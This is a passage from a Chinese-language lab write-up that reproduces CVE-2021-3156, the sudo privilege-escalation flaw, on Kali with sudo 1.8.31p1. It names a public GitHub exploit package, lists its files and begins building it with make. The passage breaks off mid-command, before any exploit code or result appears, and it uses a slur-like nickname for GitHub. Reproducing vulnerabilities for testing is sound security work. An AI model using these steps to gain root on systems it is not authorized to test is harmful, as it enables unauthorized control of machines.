测试环境
该漏洞最开始给出的exp是针对Ubuntu18和20版本以及Debian10版本的,于是我们直接在Debian系的kali(19版本)上测一下。
复现所用到的sudo版本。
Sudo 版本 1.8.31p1
Sudoers 策略插件版本 1.8.31p1
Sudoers 文件语法版本 46
Sudoers I/O plugin version 1.8.31p1
测试准备
首先下载gayhub上的exp套餐(https://github.com/blasty/CVE-2021-3156) 看一下套餐内容,
zeeker@kali:~/CVE-2021-3156$ ls -l
总用量 256
-rwxr-xr-x 1 zeeker root 1993 5月 15 00:35 brute.sh
-rw-r--r-- 1 zeeker root 4615 5月 15 00:35 hax.c
-rw-r--r-- 1 zeeker root 454 5月 15 00:35 lib.c
drwxr-xr-x 2 zeeker zeeker 4096 5月 15 00:38 libnss_X
-rw-r--r-- 1 zeeker root 273 5月 15 00:35 Makefile
drwxr-xr-x 2 zeeker root 4096 5月 15 00:35 out
-rw-r--r-- 1 zeeker root 186794 5月 15 00:35 possib
-rw-r--r-- 1 zeeker root 1242 5月 15 00:35 README.md
-rw-r--r-- 1 zeeker root 19032 5月 15 00:35 success.txt
-rwxr-xr-x 1 zeeker zeeker 17264 5月 15 00:38 sudo-hax-me-a-sandwich
make
zeeker@kali:~/CVE-2021-3156$ make
rm -rf libnss_X
mkdir libnss_X
gcc -std=